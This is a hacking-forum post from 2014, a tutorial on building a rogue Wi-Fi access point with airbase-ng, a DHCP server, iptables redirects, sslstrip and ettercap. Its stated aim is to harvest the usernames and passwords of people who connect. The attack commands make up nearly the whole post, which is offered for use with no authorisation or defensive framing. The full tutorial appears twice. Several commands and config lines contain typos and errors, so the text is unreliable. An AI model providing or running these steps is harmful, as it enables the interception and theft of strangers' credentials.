Search
HZ Tracker
Latest topics
Who is online?
In total there are 7 users online :: 0 Registered, 0 Hidden and 7 Guests None
Most users ever online was 38 on Sun Mar 19, 2023 10:07 pm
Most Viewed Topics
Rogue AP MiTM Attack (Fake AP)
Page 1 of 1
Rogue AP MiTM Attack (Fake AP)
by kyle5647 Fri Jun 13, 2014 4:46 pm
Introduction
That's what Wikipedia says: A rogue access point is a wireless acces point that has either been installed on a secure company network without explicit authorization from a local network administrator, or has been created to allow a hacker to conduct a man-in-the-middle-attack .
basicaly a Rogue Ap is a fake Ap which you can use to do MiTM attacks. if you don't know what those ar -> [You must be registered and logged in to see this link.]
This method uses a dhcp server. There are other methods which I will cover in another tutorial.
So let's start.
What do you need?
1. Either a VM running Kali or a PC/Laptop running it
2. 2x Network adapter (or a wired connection)
3. one of them must support both, monitor and master mode
What do you need to do?
Configure the DHCP Server
1. Open terminal
2. route -n (note Gateway I'll assume the GW is 192.168.0.1)
3. apt-get install dhcp3-server (install the dhcp3 server)
4. nano /etc/dhcpd.conf (configure the dhcp serv)
5. type or paste the following into your .conf
authorative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.0 netmask 255.255.255.0 {
option routers 192.168.1.1;
option subnet-mask 255.255.255.0;
option domain-name "name you want the router to be called"
option domain-name-servers 192.168.1.1;
ranger 192.168.1.2 192.168.1.40;
}
6. Hit ctrl+x then y then enter (save the file)
Start the AP
1. airmon-ng (check Net.Adap. will asume it's wlan0)
2. airmon-ng start wlan0 (start the mon mode = mon0)
3. airbase-ng -c 11 -e "name you want it to be called" mon0
4. DON'T CLOSE THE TERMINAL
Configure the Tunnel Interface
1. Open Terminal.
2. ifconfig at0 192.168.1.1 netmask 255.255.255.0 (set ip and netmask)
3. ifconfig at0 mtu 1400 (set MTU)
4. route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1 (add routing table)
5. echo 1 </procs/sys/net/ipv4/ip_forward (enable IP forwarding)
6. iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.0.1 (entering iptables rules)
7. iptables -P FORWARD ACCEPT (accept forwarding)
8. iptabels --append FORWARD --in-interface at0 -j ACCEPT
9. iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
10. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to- port 10000
Start DHCP Server
1. dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
2. /etc/init.d/isc-dhcp-server start
Starting SSL Strip
1. sslstrip -f -p -k 10000
2. DON'T CLOSE TERMINAL
Harvest
1. Open terminal
2. ettercap -p -u -T -q -i at0 (start ettercap)
Congrats! If you have't run into any errors you should be able to get all user/pass that are beeing sent over the AP.
That's what Wikipedia says: A rogue access point is a wireless acces point that has either been installed on a secure company network without explicit authorization from a local network administrator, or has been created to allow a hacker to conduct a man-in-the-middle-attack .
basicaly a Rogue Ap is a fake Ap which you can use to do MiTM attacks. if you don't know what those ar -> [You must be registered and logged in to see this link.]
This method uses a dhcp server. There are other methods which I will cover in another tutorial.
So let's start.
What do you need?
1. Either a VM running Kali or a PC/Laptop running it
2. 2x Network adapter (or a wired connection)
3. one of them must support both, monitor and master mode
What do you need to do?
Configure the DHCP Server
1. Open terminal
2. route -n (note Gateway I'll assume the GW is 192.168.0.1)
3. apt-get install dhcp3-server (install the dhcp3 server)
4. nano /etc/dhcpd.conf (configure the dhcp serv)
5. type or paste the following into your .conf
authorative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.0 netmask 255.255.255.0 {
option routers 192.168.1.1;
option subnet-mask 255.255.255.0;
option domain-name "name you want the router to be called"
option domain-name-servers 192.168.1.1;
ranger 192.168.1.2 192.168.1.40;
}
6. Hit ctrl+x then y then enter (save the file)
Start the AP
1. airmon-ng (check Net.Adap. will asume it's wlan0)
2. airmon-ng start wlan0 (start the mon mode = mon0)
3. airbase-ng -c 11 -e "name you want it to be called" mon0
4. DON'T CLOSE THE TERMINAL
Configure the Tunnel Interface
1. Open Terminal.
2. ifconfig at0 192.168.1.1 netmask 255.255.255.0 (set ip and netmask)
3. ifconfig at0 mtu 1400 (set MTU)
4. route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1 (add routing table)
5. echo 1 </procs/sys/net/ipv4/ip_forward (enable IP forwarding)
6. iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.0.1 (entering iptables rules)
7. iptables -P FORWARD ACCEPT (accept forwarding)
8. iptabels --append FORWARD --in-interface at0 -j ACCEPT
9. iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
10. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to- port 10000
Start DHCP Server
1. dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
2. /etc/init.d/isc-dhcp-server start
Starting SSL Strip
1. sslstrip -f -p -k 10000
2. DON'T CLOSE TERMINAL
Harvest
1. Open terminal
2. ettercap -p -u -T -q -i at0 (start ettercap)
Congrats! If you have't run into any errors you should be able to get all user/pass that are beeing sent over the AP.
kyle5647- Member
- Posts : 40
Join date : 2014-04-08
Similar topics» [Tut] How to Create a Fake Access Point and Mess with People. NOOB FRIENDLY
» [iOS TUT] How to hack Clash of Clans (Stay Online, Loot Search and Simulate attack)
» [iOS TUT] How to hack Clash of Clans (Stay Online, Loot Search and Simulate attack)
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum
» SQL injection and Quote escaping
» [TUT] Chmod: Files & Permissions [TUT]
» Reaver pixiewps
» How To Crash Someone's Skype in 10 SECONDS
» Internet Security & IP Security (IPSec)
» [Python] Infinite / Definite File Generator
» [C#] String Case-Inversion
» Rekall Memory Forensic Framework